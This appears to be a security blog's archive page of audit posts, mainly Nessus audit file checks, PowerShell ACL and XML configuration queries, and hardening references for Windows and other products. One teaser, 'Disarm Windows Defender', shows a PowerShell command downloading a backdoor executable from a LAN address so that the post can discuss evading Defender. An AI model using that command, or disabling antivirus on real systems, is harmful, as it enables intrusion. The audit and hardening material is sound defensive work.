Category Archives: Audit

Verify Permissions on files (Windows)

Objective

Changes to the permissions on files could block security settings from being applied.
Changes to the permissions on files could leak sensitive information.
Changes to the permissions on files could lead to a system compromise.
Audit files.

Manual audit with powershell

View the permission on the application log file with powershell

get-acl "C:\Windows\SYSTEM32\WINEVT\LOGS\application.evtx" | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Windows\SYSTEM32\WINEVT\LOGS\application.evtx
Owner : NT AUTHORITY\LOCAL SERVICE
Group : NT AUTHORITY\LOCAL SERVICE
Access : NT SERVICE\EventLog Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
Audit :
Sddl : O:LSG:LSD:AI(A;ID;FA;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)(A;ID;FA;;;SY)(A;ID;FA;;;
BA)

Audit with Nessus auditfile

<check_type: "Windows" version:"2">
<group_policy: "MS Windows Server">
 
<file_acl: "ACL_WINEVT_LOGS_application.evtx">
<user: "Administrators">
acl_inheritance: "inherited"
acl_apply: "this object only"
acl_allow: "full control"
</user>
 
<user: "System">
acl_inheritance: "inherited"
acl_apply: "this object only"
acl_allow: "full control"
</user>
 
<user: "EventLog">
acl_inheritance: "inherited"
acl_apply: "this object only"
acl_allow: "full control"
</user>
</acl>
 
<custom_item>
type: FILE_PERMISSIONS
description: "Audit file permissions om %SystemRoot%\SYSTEM32\WINEVT\LOGS\application.evtx"
value_type: FILE_ACL
value_data: "ACL_WINEVT_LOGS_application.evtx"
file: "C:\Windows\SYSTEM32\WINEVT\LOGS\application.evtx"
</custom_item>
 
</group_policy>
</check_type>

Error

Running this auditfile with this specific file results into an error because the file has a file lock.

Windows Compliance Checks, version 1.263
 
Which file contains your security policy : SMB login : stty: 'standard input': Inappropriate ioctl for device
SMB password : stty: 'standard input': Inappropriate ioctl for device
 
SMB domain (optional) : "Audit for %SystemRoot%\SYSTEM32\WINEVT\LOGS\application.evtx": [ERROR]
 
FILE_ERROR_FILE_CREATE: the file could not be opened. It could not be found or permissions were insufficient
 
file: C:\Windows\SYSTEM32\WINEVT\LOGS\application.evtx

Alternative approach

We can use the powershell command-let get-acl to perform the audit.
We run the command and filter out the known good values.

get-acl "C:\Windows\SYSTEM32\WINEVT\LOGS\setup.evtx" | select -ExpandProperty access | select IdentityReference,
FileSystemRights | Where {$_.IdentityReference -ne "NT SERVICE\EventLog" -and $_.IdentityReference -ne "NT AUTHORITY\S
YSTEM" -and $_.IdentityReference -ne "BUILTIN\Administrators" }

New Nessus Auditfile Check

<check_type: "Windows" version:"2">
<group_policy: "MS Windows Server">
 
<custom_item>
type : AUDIT_POWERSHELL
description : "Audit file permissions om %SystemRoot%\SYSTEM32\WINEVT\LOGS\application.evtx"
value_type : POLICY_TEXT
value_data : ""
powershell_args : 'get-acl \\"C:\\Windows\\SYSTEM32\\WINEVT\\LOGS\\setup.evtx\\" | select -ExpandProperty access | select IdentityReference, FileSystemRights | Where {$_.IdentityReference -ne \\"NT SERVICE\\EventLog\\" -and $_.IdentityReference -ne \\"NT AUTHORITY\\SYSTEM\\" -and $_.IdentityReference -ne \\"BUILTIN\\Administrators\\" }'
check_type : CHECK_EQUAL
powershell_option : CAN_BE_NULL
</custom_item>
 
</group_policy>
</check_type>

References

V-63533 – Permissions for the Application event log must prevent access by non-privileged accounts.
V-63537 – Permissions for the Security event log must prevent access by non-privileged accounts.
V-63541 – Permissions for the System event log must prevent access by non-privileged accounts

Server Message Block (SMB) Protocol Version 1 Unspecified RCE

Nessus Output

Description
The remote Windows host supports Server Message Block (SMB) Protocol version 1. 
It is, therefore, affected by an unspecified remote code execution vulnerability that allows an unauthenticated, 
remote attacker to execute arbitrary code.

Note that this vulnerability is one of multiple Equation Group vulnerabilities and 
exploits disclosed by a group known as the Shadow Brokers.

Solution
Disable SMBv1 according to the vendor instructions in Microsoft KB2696547. 
Additionally, block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.

Continue reading →

Audit Domain based Group Policies

Objective

Group Policy Objects contain sensitive configuration information which can be viewed by default by at least all members of the Domain.
Misconfigurations of Group Policy settings or its content can have a huge impact on the environment.
A periodic audit is advised.

Continue reading →

VMware Tools

Nessus

You can use Nessus to detect VMware Tools:

Microsoft Windows Installed Software Enumeration (credentialed check) (20811)
SNMP Query Installed Software Disclosure (19763)

There are currently no version checking / vulnerability plugins.
A manual vulnerability assessment is required.

Continue reading →

MS15-011: Vulnerability in Group Policy Could Allow Remote Code Execution (3000483)

Nessus Output

KB 3000483 or a related, subsequent update was successfully 
installed, but the GPO setting "Hardened UNC Paths" has not 
been enabled.

Continue reading →

MS15-118: Security Update for .NET Framework to Address Elevation of Privilege (3104507)

Nessus Output

On Windows 10 the following output is recorded even if all Windows updates are applied.

 - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Deployment.dll has not been patched.
    Remote version : 2.0.50727.8670
    Should be      : 2.0.50727.8671

Continue reading →

MS KB2719662: Vulnerabilities in Gadgets Could Allow Remote Code Execution

Nessus Output

Nessus determined the workaround is not being used because the following
registry value does not exist :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Windows\Sidebar\TurnOffSidebar

Continue reading →

Microsoft Windows SMB Registry : Winlogon Cached Password Weakness

Nessus Description

The registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount is non-null. It means that the remote host locally caches the passwords of the users when they log in, in order to continue to allow the users to log in in the case of the failure of the PDC. Continue reading →

MS KB3009008: Vulnerability in SSL 3.0 Could Allow Information Disclosure (POODLE)

Nessus Output

The workaround to disable SSL 3.0 for all server software installed on
the remote host has not been applied.

The workaround to disable SSL 3.0 for all client software installed on
the remote host has not been applied.

Continue reading →

MS KB2960358: Update for Disabling RC4 in .NET TLS

Nessus Output

The following registry values have not been
set to 1 :
HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\SchUseStrongCrypto
HKLM\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\SchUseStrongCrypto

Continue reading →

MS15-124: Cumulative Security Update for Internet Explorer (3116180)

Nessus Output

ASLR hardening settings for Internet Explorer in KB3125869
have not been applied. The following DWORD keys must be
created with a value of 1:
  - HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_USER32_EXCEPTION_HANDLER_HARDENING\iexplore.exe
  - HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_USER32_EXCEPTION_HANDLER_HARDENING\iexplore.exe

Continue reading →

Peoplesoft

Best Practice Guides:

Securing Your PeopleSoft Application Environment

FoxIT Software

Vulnerabilities

Nessus Plugins for FoxIT

Audit Check Point

References used to develop Nessus Auditfiles for Checkpoint:

Continue reading →

HP Integrated Lights-Out (iLO)

Tenable Security Center

References:

Vulnerabilities:

CVE Details

Audit Azure with Nessus

Auditfiles:

Tenable currently provides 3 Nessus auditfiles to audit Microsoft Azure:

TNS_Microsoft_Azure_Best_Practices-Databases.audit
TNS_Microsoft_Azure_Best_Practices-Infrastructure.audit
TNS_Microsoft_Azure_Best_Practices-Websites.audit

Continue reading →

Testing Nessus Auditfile checks with nasl

Objective

When you develop and test many compliance checks for Nessus auditfiles and want a quick and easy way to test these checks… read on.

Continue reading →

Docker

Vulnerabilities:

CVEdetails

Exploits:

ExploitDB

Nessus:

Auditing Docker with Nessus

Nessus Plugins for Docker

Best Practises

CIS Benchmark

Citrix Netscaler

Links and notes regarding securing and auditing Citrix Netscaler.

Continue reading →

Nessus

References:

Vulnerabilities:

CVE Details

CISCO

References used to develop Nessus Auditfiles for Cisco Devices:

Continue reading →

SPLUNK

References used to develop Nessus Auditfiles for Splunk:

Continue reading →

Tibco

References used to develop Nessus Auditfiles for Tibco Products:

Continue reading →

Check Internet Explorer version

Objective:

According to Microsoft announcement: Support for older versions of Internet Explorer ended on January 12th, 2016, you should verify you Windows systems to the latest Microsoft Support Lifecycle statements.

Continue reading →

DB2

References used to develop Nessus Auditfiles for Oracle:

Nessus sample auditfiles on Tenable Support Portal
Tenable discussion forum
CIS Benchmarks

Continue reading →

ORACLE

References used to develop Nessus Auditfiles for Oracle:

Continue reading →

Check Windows File Integrity with sfc and powershell

Objective

Use file integrity checking tools to ensure that critical system files (including sensitive system and application executables, libraries, and configurations) have not been altered.
Critical Security Control #3: Secure Configurations for Hardware and Software – System 3.5

SFC and Powershell

Windows contains a build-in utility called sfc to verify and fix Windows File Integrity issues.
Lets have a quick look what this utility and some powershell can do for us.
The flags differ on older versions of Windows so check it’s options before running the commands below.

Continue reading →

LDAP

STIGs:

CIS Benchmarks

DNS

STIGs:

CIS Benchmarks

Nessus:

Nessus Plugins for DNS

Active Directory

STIGS:

CIS Benchmarks:

See Windows Server Benchmarks

CVE Details:

Nessus:

Nessus Plugins for Active Directory

Audit XML configuration files

A quick example to query a xml config file to retrieve a specific security setting

Powershell:

Select-Xml -path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config -XPath "/configuration/system.web/membership/providers/add" | 
Select-Object -ExpandProperty node | 
Select-Object passwordFormat
 
passwordFormat
--------------
Hashed

Disarm Windows Defender

When we try to download a backdoor program Windows Defender will block the file.

Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"

Continue reading →

Pingsweeps

A few code snippets to perform ping sweeps:

Continue reading →

Hardening IIS

Best practices and references used for hardening IIS.

Continue reading →

Cloud Security

Links:

Websphere MQ

Security Configuration Guides:

CIS Benchmark – not available
STIG – not available
SCAP – not available
Secure Messaging Scenarios with WebSphere MQ
WebSphere MQ Security in an Enterprise Environment

Known vulnerabilities: CVE Details
Available Exploits: Exploit-DB

Apache Tomcat

Security Configuration Guides:

CIS Benchmarks
STIG – not available
SCAP NIST – not available
Apache Tomcat 7 – Security Considerations
Apache Tomcat 8 – Security Considerations
Apache Tomcat 9 – Security Considerations

Vulnerabilities:

Exploits:

Available Exploits: Exploit-DB

Apache HTTP Server

Security Configuration Guides:

Apache HTTP Server Security Report
Known vulnerabilities: CVE Details
Available Exploits: Exploit-DB

Websphere Application Server

Security Configuration Guides:

CIS Benchmark –not available
STIG –not available
SCAP – not available
Redbook IBM Websphere Application Server v.7.0 Security Guide
Redbook IBM Websphere Application Server v.8.0 Administration and Configuration Guide
Redbook IBM Websphere Application Server v.8.5 Administration and Configuration Guide

Websphere Application Server bevat IBM HTTP Server die zijn oorsprong vind in Apache HTTP Server.

Known vulnerabilities: CVE Details
Available Exploits: Exploit-DB

STIGs

STIGs are Security Technical Installation Guides.

I use the STIGS together with the product documentation to create and review security baselines and development of Nessus Audit files.

STIGs can be downloaded here: http://www.stigviewer.com

Critical Security Controls

The SANS Critical Security Controls can be used to prioritize your security policies.

CIS SECURITY BENCHMARKS

The CIS Security Benchmarks provide a good starting point for hardening your servers and applications.

The latest CIS Security Benchmarks can be downloaded here.

You can browse the available security Benchmarks here

ADOBE FLASH

Verify the flash version in your browser here
Continue reading →

WINDOWS

References used to develop Nessus Auditfiles for Windows :

Continue reading →

RED HAT ENTERPRISE LINUX

Resources used for creating custom Nessus Auditfile for Red Hat Enterprise:

Continue reading →

‘for loop’ in a Linux Nessus audit file

I’m working on a custom Linux auditfile with Oracle checks.
I want this audit file to be generic, so no hardcoded instance names in the auditfile.

Continue reading →

Performing MS SQL Audit with Nessus

Issue

The default Nessus\CIS auditfiles for MS SQL are split up in OS level and Database level auditfiles. This results in at-least 2 auditfile per instance which you have to schedule in 2 jobs.
This is not a scalable solution. Continue reading →